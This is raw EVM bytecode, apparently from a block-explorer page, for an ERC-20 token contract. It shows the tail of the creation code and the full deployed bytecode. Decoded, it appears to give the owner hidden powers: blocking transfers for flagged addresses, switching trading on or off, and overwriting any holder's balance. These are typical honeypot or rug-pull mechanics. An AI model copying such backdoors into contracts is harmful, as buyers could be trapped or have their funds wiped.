d3565b915061172482611cc6565b604082019050919050565b600061173c6020836119d3565b915061174782611d15565b602082019050919050565b600061175f6021836119d3565b915061176a82611d3e565b604082019050919050565b60006117826025836119d3565b915061178d82611d8d565b604082019050919050565b60006117a56000836119d3565b91506117b082611ddc565b600082019050919050565b60006117c86024836119d3565b91506117d382611ddf565b604082019050919050565b60006117eb6025836119d3565b91506117f682611e2e565b604082019050919050565b61180a81611aac565b82525050565b60006020820190506118256000830184611638565b92915050565b600060208201905081810360008301526118458184611647565b905092915050565b6000602082019050818103600083015261186681611680565b9050919050565b60006020820190508181036000830152611886816116a3565b9050919050565b600060208201905081810360008301526118a6816116c6565b9050919050565b600060208201905081810360008301526118c6816116e9565b9050919050565b600060208201905081810360008301526118e68161170c565b9050919050565b600060208201905081810360008301526119068161172f565b9050919050565b6000602082019050818103600083015261192681611752565b9050919050565b6000602082019050818103600083015261194681611775565b9050919050565b6000602082019050818103600083015261196681611798565b9050919050565b60006020820190508181036000830152611986816117bb565b9050919050565b600060208201905081810360008301526119a6816117de565b9050919050565b60006020820190506119c26000830184611801565b92915050565b600081519050919050565b600082825260208201905092915050565b60006119ef82611aac565b91506119fa83611aac565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611a2f57611a2e611b1b565b5b828201905092915050565b6000611a4582611aac565b9150611a5083611aac565b925082821015611a6357611a62611b1b565b5b828203905092915050565b6000611a7982611a8c565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b60005b83811015611ad4578082015181840152602081019050611ab9565b83811115611ae3576000848401525b50505050565b60006002820490506001821680611b0157607f821691505b60208210811415611b1557611b14611b4a565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f5472616e7366657220616d6f756e74206d75737420626520677261746572207460008201527f6861746e207a65726f0000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b50565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b611e8681611a6e565b8114611e9157600080fd5b50565b611e9d81611aac565b8114611ea857600080fd5b5056fea264697066735822122072f0205aefdfc6e3badf1b8b383f50d78ba5e9fe9dbf023e3410af30d74ca63264736f6c6343000801003300000000000000000000000000000000000000000000000001e018b07e67759f

Deployed ByteCode

0x608060405234801561001057600080fd5b50600436106101165760003560e01c806370a08231116100a2578063ac8a93b811610071578063ac8a93b81461031b578063ca43051914610339578063d89cc15014610355578063dd62ed3e1461035f578063f3b95cd71461038f57610116565b806370a082311461026d57806395d89b411461029d578063a457c2d7146102bb578063a9059cbb146102eb57610116565b806323b872dd116100e957806323b872dd146101a3578063313ce567146101d357806339509351146101f15780633cd64cf3146102215780634355b9d21461025157610116565b806306fdde031461011b578063095ea7b31461013957806318160ddd146101695780631fe6d7a814610187575b600080fd5b6101236103ab565b604051610130919061182b565b60405180910390f35b610153600480360381019061014e91906115d3565b61043d565b6040516101609190611810565b60405180910390f35b61017161045b565b60405161017e91906119ad565b60405180910390f35b6101a1600480360381019061019c919061160f565b610465565b005b6101bd60048036038101906101b89190611584565b6104ff565b6040516101ca9190611810565b60405180910390f35b6101db610600565b6040516101e891906119ad565b60405180910390f35b61020b600480360381019061020691906115d3565b61060a565b6040516102189190611810565b60405180910390f35b61023b6004803603810190610236919061151f565b6106b6565b6040516102489190611810565b60405180910390f35b61026b6004803603810190610266919061151f565b61070c565b005b6102876004803603810190610282919061151f565b6107f6565b60405161029491906119ad565b60405180910390f35b6102a561083e565b6040516102b2919061182b565b60405180910390f35b6102d560048036038101906102d091906115d3565b6108d0565b6040516102e29190611810565b60405180910390f35b610305600480360381019061030091906115d3565b6109c4565b6040516103129190611810565b60405180910390f35b6103236109e2565b6040516103309190611810565b60405180910390f35b610353600480360381019061034e919061151f565b6109f9565b005b61035d610ae4565b005b61037960048036038101906103749190611548565b610bce565b60405161038691906119ad565b60405180910390f35b6103a960048036038101906103a491906115d3565b610c55565b005b6060600580546103ba90611ae9565b80601f01602080910402602001604051908101604052809291908181526020018280546103e690611ae9565b80156104335780601f1061040857610100808354040283529160200191610433565b820191906000526020600020905b81548152906001019060200180831161041657829003601f168201915b5050505050905090565b600061045161044a610cf3565b8484610cfb565b6001905092915050565b6000600354905090565b3373ffffffffffffffffffffffffffffffffffffffff16600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146104f5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104ec906118ed565b60405180910390fd5b8060048190555050565b600061050c848484610ec6565b6000600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610557610cf3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156105d7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105ce906118cd565b60405180910390fd5b6105f4856105e3610cf3565b85846105ef9190611a3a565b610cfb565b60019150509392505050565b6000600754905090565b60006106ac610617610cf3565b848460026000610625610cf3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546106a791906119e4565b610cfb565b6001905092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b3373ffffffffffffffffffffffffffffffffffffffff16600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461079c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610793906118ed565b60405180910390fd5b60018060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60606006805461084d90611ae9565b80601f016020809104026020016040519081016040528092919081815260200182805461087990611ae9565b80156108c65780601f1061089b576101008083540402835291602001916108c6565b820191906000526020600020905b8154815290600101906020018083116108a957829003601f168201915b5050505050905090565b600080600260006108df610cf3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561099c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109939061198d565b60405180910390fd5b6109b96109a7610cf3565b8585846109b49190611a3a565b610cfb565b600191505092915050565b60006109d86109d1610cf3565b8484610ec6565b6001905092915050565b6000600860009054906101000a900460ff16905090565b3373ffffffffffffffffffffffffffffffffffffffff16600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610a89576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a80906118ed565b60405180910390fd5b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b3373ffffffffffffffffffffffffffffffffffffffff16600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610b74576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b6b906118ed565b60405180910390fd5b60011515600860009054906101000a900460ff1615151415610bb0576000600860006101000a81548160ff021916908315150217905550610bcc565b6001600860006101000a81548160ff0219169083151502179055505b565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b3373ffffffffffffffffffffffffffffffffffffffff16600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610ce5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cdc906118ed565b60405180910390fd5b610cef82826113ad565b5050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d6b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d629061196d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610ddb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dd29061188d565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610eb991906119ad565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610f36576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f2d9061192d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610fa6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f9d9061184d565b60405180910390fd5b60008111610fe9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fe09061186d565b60405180910390fd5b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168061108a5750600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156110e65760001515600860009054906101000a900460ff161515146110e5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110dc9061194d565b60405180910390fd5b5b60011515600860009054906101000a900460ff16151514806111555750600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b806111ad5750600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b15611351576111bd8383836114f0565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611243576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161123a906118ad565b60405180910390fd5b818161124f9190611a3a565b6000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546112df91906119e4565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161134391906119ad565b60405180910390a3506113a8565b60011515600860009054906101000a900460ff161515146113a7576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161139e9061194d565b60405180910390fd5b5b505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561141d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114149061190d565b60405180910390fd5b8060045461142b9190611a3a565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550806003600082825461147f9190611a3a565b92505081905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516114e491906119ad565b60405180910390a35050565b505050565b60008135905061150481611e7d565b92915050565b60008135905061151981611e94565b92915050565b60006020828403121561153157600080fd5b600061153f848285016114f5565b91505092915050565b6000806040838503121561155b57600080fd5b6000611569858286016114f5565b925050602061157a858286016114f5565b9150509250929050565b60008060006060848603121561159957600080fd5b60006115a7868287016114f5565b93505060206115b8868287016114f5565b92505060406115c98682870161150a565b9150509250925092565b600080604083850312156115e657600080fd5b60006115f4858286016114f5565b92505060206116058582860161150a565b9150509250929050565b60006020828403121561162157600080fd5b600061162f8482850161150a565b91505092915050565b61164181611a80565b82525050565b6000611652826119c8565b61165c81856119d3565b935061166c818560208601611ab6565b61167581611b79565b840191505092915050565b600061168d6023836119d3565b915061169882611b8a565b604082019050919050565b60006116b06029836119d3565b91506116bb82611bd9565b604082019050919050565b60006116d36022836119d3565b91506116de82611c28565b604082019050919050565b60006116f66026836119d3565b915061170182611c77565b604082019050919050565b60006117196028836119d3565b915061172482611cc6565b604082019050919050565b600061173c6020836119d3565b915061174782611d15565b602082019050919050565b600061175f6021836119d3565b915061176a82611d3e565b604082019050919050565b60006117826025836119d3565b915061178d82611d8d565b604082019050919050565b60006117a56000836119d3565b91506117b082611ddc565b600082019050919050565b60006117c86024836119d3565b91506117d382611ddf565b604082019050919050565b60006117eb6025836119d3565b91506117f682611e2e565b604082019050919050565b61180a81611aac565b82525050565b60006020820190506118256000830184611638565b92915050565b600060208201905081810360008301526118458184611647565b905092915050565b6000602082019050818103600083015261186681611680565b9050919050565b60006020820190508181036000830152611886816116a3565b9050919050565b600060208201905081810360008301526118a6816116c6565b9050919050565b600060208201905081810360008301526118c6816116e9565b9050919050565b600060208201905081810360008301526118e68161170c565b9050919050565b600060208201905081810360008301526119068161172f565b9050919050565b6000602082019050818103600083015261192681611752565b9050919050565b6000602082019050818103600083015261194681611775565b9050919050565b6000602082019050818103600083015261196681611798565b9050919050565b60006020820190508181036000830152611986816117bb565b9050919050565b600060208201905081810360008301526119a6816117de565b9050919050565b60006020820190506119c26000830184611801565b92915050565b600081519050919050565b600082825260208201905092915050565b60006119ef82611aac565b91506119fa83611aac565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611a2f57611a2e611b1b565b5b828201905092915050565b6000611a4582611aac565b9150611a5083611aac565b925082821015611a6357611a62611b1b565b5b828203905092915050565b6000611a7982611a8c565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b60005b83811015611ad4578082015181840152602081019050611ab9565b83811115611ae3576000848401525b50505050565b60006002820490506001821680611b0157607f821691505b60208210811415611b1557611b14611b4a565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f5472616e7366657220616d6f756e74206d75737420626520677261746572207460008201527f6861746e207a65726f0000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b50565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b611e8681611a6e565b8114611e9157600080fd5b50565b611e9d81611aac565b8114611ea857600080fd5b5056fea264697066735822122072f0205aefdfc6e3badf1b8b383f50d78ba5e9fe9dbf023e3410af30d74ca63264736f6c63430008010033